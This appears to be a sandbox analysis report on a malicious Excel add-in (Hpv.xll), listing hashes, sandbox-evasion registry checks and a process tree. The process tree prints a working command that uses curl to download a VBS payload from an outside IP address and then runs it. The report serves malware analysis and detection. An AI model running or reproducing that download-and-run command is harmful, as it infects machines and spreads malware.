Analysis
-
max time kernel
134s -
max time network
134s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
21-09-2023 17:14
Static task
static1
Behavioral task
behavioral1
Sample
Hpv.xll
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Hpv.xll
Resource
win10-20230915-en
General
-
Target
Hpv.xll
-
Size
50KB
-
MD5
d1a45948f411c02136ca98410475de52
-
SHA1
86ce40651326b8a67730da4e429d1bc202d46226
-
SHA256
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
-
SHA512
22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
SSDEEP
1536:oUK23Jsm6Nh5wF3s8KjrtN/5TqRGiNwmU2x0X2Y:ICsNh5wF3s8KXHRTviNnAmY
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
me.exepid Process 196 me.exe -
Loads dropped DLL 2 IoCs
Processes:
EXCEL.EXEpid Process 4628 EXCEL.EXE 4628 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 4628 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid Process 4628 EXCEL.EXE 4628 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
EXCEL.EXEpid Process 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE 4628 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEme.exedescription pid Process procid_target PID 4628 wrote to memory of 196 4628 EXCEL.EXE 71 PID 4628 wrote to memory of 196 4628 EXCEL.EXE 71 PID 196 wrote to memory of 4280 196 me.exe 72 PID 196 wrote to memory of 4280 196 me.exe 72
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Hpv.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Public\me.exeC:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\users\public\1.vbs3⤵PID:4280
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD598447a7f26ee9dac6b806924d6e21c90
SHA1a67909346a56289b7087821437efcaa51da3b083
SHA256c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b
-
Filesize
14KB
MD598447a7f26ee9dac6b806924d6e21c90
SHA1a67909346a56289b7087821437efcaa51da3b083
SHA256c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b
-
Filesize
50KB
MD5d1a45948f411c02136ca98410475de52
SHA186ce40651326b8a67730da4e429d1bc202d46226
SHA256392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA51222f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
Filesize
50KB
MD5d1a45948f411c02136ca98410475de52
SHA186ce40651326b8a67730da4e429d1bc202d46226
SHA256392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA51222f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0